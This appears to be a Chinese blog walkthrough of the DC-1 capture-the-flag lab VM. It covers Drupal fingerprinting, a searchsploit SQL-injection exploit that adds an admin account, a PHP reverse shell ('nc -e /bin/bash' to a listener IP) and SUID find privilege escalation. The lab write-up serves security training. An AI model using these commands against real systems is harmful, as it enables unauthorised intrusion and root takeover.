【DC系列】DC-1靶机实战详细讲解

【DC系列01】DC-1靶机

DC-1下载地址:https://www.five86.com/downloads/DC-1.zip

首先收集信息进行ip扫描

nmap -sS -T4 192.168.197.0/24

image-20230627145511103

打开后是这个样子

image-20230627145556711

看到一个登陆窗口,但是不能爆破,连续爆破超过5次会被禁止登陆。

image-20230627150423726

利用Wappalyzer可以看出来这个web用的是一个Drupal 7的内容管理系统,我们可以去找针对这个的扫描器。

image-20230627150307537

经过不懈的寻找,发现了这个扫描器(droopescan)。

进入这个网站后寻找安装方法,发现可以利用pip安装。

我们就在kali中pip install droopescan安装

image-20230627150705777

image-20230627155557092

我们扫出来的版本是7.22-7.26,就可以去searchsploit drupal查找漏洞文件

image-20230627155915705

查找了这么多,我用的是34992这个sql注入命令文件,然后searchsploit -m 34992下载就好了

image-20230627160429553

这样就可以在数据库中添加自己的账号密码

image-20230627160634860

账号密码都是tang就进去了

image-20230627160802611

这个时候我们想的就是怎么做一个反弹shell

这里我们发现了flag3,点进去看看。

image-20230627161742753

这里发现了需要用到find命令的-exec去读取shadow文件(密码存放文件,密文),所以这里想到了可能等会儿需要破解密码。

image-20230627161823451

点击Edit,我们发现这里的格式只能输入HTML或者纯文本,我们需要研究研究怎么上传php或者python代码。

image-20230627162148162

经过寻找,在这里面发现一个PHP fillter,安装后就可以上传php代码了

image-20230627161214837

安装好后发现还是不能上传php文本,所以又反过来找到了这个Permissions

image-20230627161551238

进去后有个Use the PHP code text format没有勾选,这里我们勾选上。

image-20230627161614058

这里我们就可以上传PHP代码了,可以上传个木马做一个反弹shell。

image-20230627163150781

<?php system('nc -e /bin/bash 192.168.197.160 8888');?>

image-20230627164009695
kali上设置一个监听,网页刷新下shell就过来了。

image-20230627164038443

利用python代码可以看着好看点,能显示目录。

python -c "import pty;pty.spawn('/bin/bash')"

image-20230627164635697

在flag3里面提到了find命令,可能关键点是find命令

sudo -l看一下,然并卵,什么都没有

image-20230627164838267

我们可以利用另一个命令,这条命令的作用是查找普通账户下拥有root权限的文件。

这里我们找到了/usr/bin/find

find / -perm -u=s -type f 2>/dev/null

image-20230627164930149

/usr/bin/find /etc/passwd -exec '/bin/sh' \;
find中的参数 -exec  执行找到的文件,find后面的/bin是什么都可以,但一定要是Linux中有的。

这里我们就可以利用下面命令进行提权,这里就有人说了,为什么不是bash,因为bash文件的权限不够。

image-20230627165537731

image-20230627165515360

接下来就可以轻松拿旗了

image-20230627172525224

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值